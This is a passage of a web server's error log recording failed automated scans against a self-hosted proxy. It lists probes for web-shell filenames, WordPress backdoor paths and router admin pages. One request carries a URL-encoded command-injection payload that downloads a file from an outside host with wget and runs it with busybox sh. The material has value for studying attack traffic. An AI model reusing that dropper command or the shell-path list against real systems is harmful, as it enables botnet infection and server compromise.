"/var/www/html/admin.rdp" failed (2: No such file or directory), client: 116.62.33.140, server: localhost-nginx-proxy-manager, request: "GET /admin.rdp HTTP/1.1", host: "78.131.122.113" +2026/02/01 10:00:26 [error] 274#274: *10992 open() "/var/www/html/internal.rdp" failed (2: No such file or directory), client: 116.62.33.140, server: localhost-nginx-proxy-manager, request: "GET /internal.rdp HTTP/1.1", host: "78.131.122.113" +2026/02/01 10:11:24 [error] 274#274: *10993 "/var/www/html/bin/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bin/ HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 11:03:58 [error] 281#281: *11038 open() "/var/www/html/device.rsp" failed (2: No such file or directory), client: 176.65.139.20, server: localhost-nginx-proxy-manager, request: "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3B%20busybox%20rm%20bbc%3B%20wget%20http%3A%2F%2F176.65.139.21%3A8080%2Ffile%2Fbbc%3B%20busybox%20sh%20bbc HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 11:45:10 [error] 283#283: *14034 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 223.123.43.70, server: localhost-nginx-proxy-manager, request: "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" +2026/02/01 13:07:29 [error] 284#284: *14064 open() "/var/www/html/wp-content/plugins/hellopress/wp_filemanager.php" failed (2: No such file or directory), client: 52.169.124.184, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 13:07:29 [error] 284#284: *14064 open() "/var/www/html/rip.php" failed (2: No such file or directory), client: 52.169.124.184, server: localhost-nginx-proxy-manager, request: "GET /rip.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 13:24:24 [error] 284#284: *14070 "/var/www/html/backup/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /backup/ HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 14:52:51 [error] 281#281: *14891 open() "/var/www/html/ncsi.txt" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET http://www.msftncsi.com/ncsi.txt HTTP/1.1", host: "www.msftncsi.com", referrer: "http://78.131.122.113/" +2026/02/01 14:52:51 [error] 281#281: *14892 "/var/www/html/HNAP1/index.html" is not found (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /HNAP1/ HTTP/1.1", host: "78.131.122.113", referrer: "http://78.131.122.113/" +2026/02/01 14:52:51 [error] 281#281: *14893 open() "/var/www/html/sqlite/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /sqlite/main.php HTTP/1.1", host: "78.131.122.113", referrer: "http://78.131.122.113/" +2026/02/01 14:52:51 [error] 281#281: *14894 open() "/var/www/html/sqlitemanager/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /sqlitemanager/main.php HTTP/1.1", host: "78.131.122.113", referrer: "http://78.131.122.113/" +2026/02/01 14:52:51 [error] 281#281: *14895 open() "/var/www/html/SQLiteManager/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /SQLiteManager/main.php HTTP/1.1", host: "78.131.122.113", referrer: "http://78.131.122.113/" +2026/02/01 14:52:51 [error] 281#281: *14896 open() "/var/www/html/SQLite/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /SQLite/main.php HTTP/1.1", host: "78.131.122.113", referrer: "http://78.131.122.113/" +2026/02/01 14:52:51 [error] 282#282: *14897 open() "/var/www/html/SQlite/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /SQlite/main.php HTTP/1.1", host: "78.131.122.113", referrer: "http://78.131.122.113/" +2026/02/01 14:52:51 [error] 282#282: *14898 open() "/var/www/html/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /main.php HTTP/1.1", host: "78.131.122.113", referrer: "http://78.131.122.113/" +2026/02/01 14:52:51 [error] 282#282: *14899 open() "/var/www/html/test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php HTTP/1.1", host: "78.131.122.113", referrer: "http://78.131.122.113/" +2026/02/01 14:52:51 [error] 282#282: *14900 open() "/var/www/html/SQLiteManager-1.2.4/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /SQLiteManager-1.2.4/main.php HTTP/1.1", host: "78.131.122.113", referrer: "http://78.131.122.113/" +2026/02/01 14:52:51 [error] 282#282: *14901 open() "/var/www/html/agSearch/SQlite/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /agSearch/SQlite/main.php HTTP/1.1", host: "78.131.122.113", referrer: "http://78.131.122.113/" +2026/02/01 16:08:59 [error] 283#283: *14943 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 17:08:53 [error] 288#288: *14965 open() "/var/www/html/wp-content/plugins/hellopress/wp_filemanager.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:08:53 [error] 288#288: *14965 open() "/var/www/html/166.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /166.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:08:54 [error] 288#288: *14965 open() "/var/www/html/2026.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /2026.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:08:54 [error] 288#288: *14965 open() "/var/www/html/muzu.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /muzu.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:08:54 [error] 288#288: *14965 open() "/var/www/html/reze.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /reze.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:08:54 [error] 288#288: *14965 open() "/var/www/html/jsond.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /jsond.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:08:55 [error] 288#288: *14965 open() "/var/www/html/x7.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /x7.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:08:55 [error] 288#288: *14965 open() "/var/www/html/bgymj.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /bgymj.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:08:55 [error] 288#288: *14965 open() "/var/www/html/lala.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //lala.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:08:55 [error] 288#288: *14965 open() "/var/www/html/8xyz.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /8xyz.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:08:55 [error] 288#288: *14965 open() "/var/www/html/wsd.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /wsd.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:08:56 [error] 288#288: *14965 open() "/var/www/html/Update/f35.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /Update/f35.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:08:56 [error] 288#288: *14965 open() "/var/www/html/la.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /la.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:08:57 [error] 288#288: *14965 open() "/var/www/html/Wp-good.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /Wp-good.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:08:57 [error] 288#288: *14965 open() "/var/www/html/tphp.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /tphp.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:08:57 [error] 288#288: *14965 open() "/var/www/html/a1.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /a1.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:08:58 [error] 288#288: *14965 open() "/var/www/html/nyan.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /nyan.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:08:58 [error] 288#288: *14965 open() "/var/www/html/autoload_classmap.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //autoload_classmap.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:08:58 [error] 288#288: *14965 open() "/var/www/html/alfa.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //alfa.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:08:58 [error] 288#288: *14965 open() "/var/www/html/wp-includes/assets/index.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //wp-includes/assets/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:08:59 [error] 288#288: *14965 open() "/var/www/html/luxe.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /luxe.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:08:59 [error] 288#288: *14965 "/var/www/html/update/wpupex.php/index.html" is not found (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /update/wpupex.php/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:00 [error] 288#288: *14965 open() "/var/www/html/rezor.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /rezor.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:00 [error] 288#288: *14965 open() "/var/www/html/doc.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //doc.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:00 [error] 288#288: *14965 open() "/var/www/html/wp-admin/user/index.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //wp-admin/user/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:00 [error] 288#288: *14965 open() "/var/www/html/wp-includes/css/about.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //wp-includes/css/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:01 [error] 288#288: *14965 open() "/var/www/html/install.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //install.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:01 [error] 288#288: *14965 open() "/var/www/html/~norapump/hah.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /~norapump/hah.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:01 [error] 288#288: *14965 open() "/var/www/html/sto.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /sto.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:02 [error] 288#288: *14965 open() "/var/www/html/x.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //x.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:02 [error] 288#288: *14965 open() "/var/www/html/test.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //test.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:02 [error] 288#288: *14965 "/var/www/html/wp-includes/blocks/index.html" is not found (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/blocks/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:02 [error] 288#288: *14965 open() "/var/www/html/n3.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /n3.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:03 [error] 288#288: *14965 open() "/var/www/html/wp-admin/install.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/install.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:03 [error] 288#288: *14965 open() "/var/www/html/o.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /o.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:03 [error] 288#288: *14965 open() "/var/www/html/wp-includes/ID3/index.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //wp-includes/ID3/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:03 [error] 288#288: *14965 open() "/var/www/html/class-t.api.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /class-t.api.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:04 [error] 288#288: *14965 "/var/www/html/.trash7309/f/index.html" is not found (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /.trash7309/f/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:04 [error] 288#288: *14965 open() "/var/www/html/wp.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //wp.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:04 [error] 288#288: *14965 open() "/var/www/html/wp-includes/customize/index.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //wp-includes/customize/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:04 [error] 288#288: *14965 open() "/var/www/html/wp-content/themes/seotheme/mar.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //wp-content/themes/seotheme/mar.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:05 [error] 288#288: *14965 open() "/var/www/html/h.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //h.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:05 [error] 288#288: *14965 open() "/var/www/html/skin/install/default/security.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //skin/install/default/security.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:05 [error] 288#288: *14965 open() "/var/www/html/wrt.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /wrt.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:05 [error] 288#288: *14965 open() "/var/www/html/wp-content/plugins/Core-EconX/up.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //wp-content/plugins/Core-EconX/up.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:05 [error] 288#288: *14965 "/var/www/html/wp-includes/css/index.html" is not found (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/css/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:06 [error] 288#288: *14965 open() "/var/www/html/images/c99.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /images/c99.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:07 [error] 288#288: *14965 open() "/var/www/html/png.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /png.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:07 [error] 288#288: *14965 open() "/var/www/html/wp-includes/ID3/index.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //wp-includes/ID3/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:07 [error] 288#288: *14965 open() "/var/www/html/zwso.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //zwso.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:08 [error] 288#288: *14965 open() "/var/www/html/wp-content/languages/index.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //wp-content/languages/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:08 [error] 288#288: *14965 "/var/www/html/wp-content/index.html" is not found (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //wp-content/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:08 [error] 288#288: *14965 open() "/var/www/html/wp/wp-includes/index.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /wp/wp-includes//index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:09 [error] 288#288: *14965 open() "/var/www/html/ton.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /ton.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:09 [error] 288#288: *14965 open() "/var/www/html/wso.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //wso.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:10 [error] 288#288: *14965 "/var/www/html/images/fk2e3/index.html" is not found (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /images/fk2e3/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:10 [error] 288#288: *14965 open() "/var/www/html/a2.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /a2.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:10 [error] 288#288: *14965 open() "/var/www/html/shell.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /shell.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:11 [error] 288#288: *14965 open() "/var/www/html/wp-includes/IXR/moon.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/IXR/moon.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:11 [error] 288#288: *14965 open() "/var/www/html/sxo.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /sxo.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:11 [error] 288#288: *14965 open() "/var/www/html/admin.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //admin.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:11 [error] 288#288: *14965 "/var/www/html/wp-admin/index.html" is not found (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:11 [error] 288#288: *14965 "/var/www/html/wp-content/index.html" is not found (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //wp-content/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:12 [error] 288#288: *14965 open() "/var/www/html/mans.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /mans.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:12 [error] 288#288: *14965 open() "/var/www/html/dropdown.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //dropdown.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:12 [error] 288#288: *14965 "/var/www/html/WordPress/x/index.html" is not found (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /WordPress/x/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:13 [error] 288#288: *14965 open() "/var/www/html/ze.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /ze.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:13 [error] 288#288: *14965 open() "/var/www/html/geck.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //geck.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:13 [error] 288#288: *14965 open() "/var/www/html/menu.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /menu.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:14 [error] 288#288: *14965 open() "/var/www/html/admin/function.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //admin/function.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:14 [error] 288#288: *14965 open() "/var/www/html/index/function.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //index/function.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:15 [error] 288#288: *14965 open() "/var/www/html/flower.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /flower.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:15 [error] 288#288: *14965 open() "/var/www/html/ftp.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /ftp.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:15 [error] 288#288: *14965 open() "/var/www/html/mds.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /mds.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:16 [error] 288#288: *14965 open() "/var/www/html/ahax.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /ahax.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:16 [error] 288#288: *14965 open() "/var/www/html/wp-admin/class-db.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //wp-admin/class-db.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:16 [error] 288#288: *14965 open() "/var/www/html/cool.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /cool.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:16 [error] 288#288: *14965 open() "/var/www/html/gm.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /gm.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:17 [error] 288#288: *14965 open() "/var/www/html/simple.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //simple.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:17 [error] 288#288: *14965 open() "/var/www/html/elp.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //elp.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:17 [error] 288#288: *14965 open() "/var/www/html/bolt.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /bolt.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:17 [error] 288#288: *14965 open() "/var/www/html/wp-content/uploads/index.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //wp-content/uploads/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:18 [error] 288#288: *14965 open() "/var/www/html/inputs.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //inputs.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:18 [error] 288#288: *14965 "/var/www/html/.trash7309/fafa/index.html" is not found (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /.trash7309/fafa/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:18 [error] 288#288: *14965 open() "/var/www/html/system.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /system.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:19 [error] 288#288: *14965 "/var/www/html/wp-admin/maint/index.html" is not found (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/maint/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:19 [error] 288#288: *14965 "/var/www/html/wp-admin/network/index.html" is not found (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/network/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:20 [error] 288#288: *14965 open() "/var/www/html/museu/yhweq.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /museu/yhweq.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:20 [error] 288#288: *14965 open() "/var/www/html/an.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /an.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:20 [error] 288#288: *14965 open() "/var/www/html/w.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //w.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:35 [error] 288#288: *14965 open() "/var/www/html/gmo.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /gmo.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:35 [error] 288#288: *14965 open() "/var/www/html/gib.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /gib.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:36 [error] 288#288: *14965 open() "/var/www/html/wp-miiss.php.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /wp-miiss.php.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:36 [error] 288#288: *14965 open() "/var/www/html/ho/wpup.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /ho/wpup.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:36 [error] 288#288: *14965 open() "/var/www/html/moon.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //moon.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:36 [error] 288#288: *14965 open() "/var/www/html/filesss.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /filesss.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:37 [error] 288#288: *14965 open() "/var/www/html/hey.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /hey.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:37 [error] 288#288: *14965 open() "/var/www/html/wp-content/themes/seotheme/mar.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //wp-content/themes/seotheme/mar.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:37 [error] 288#288: *14965 open() "/var/www/html/1337.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //1337.php HTTP/1.1", host: 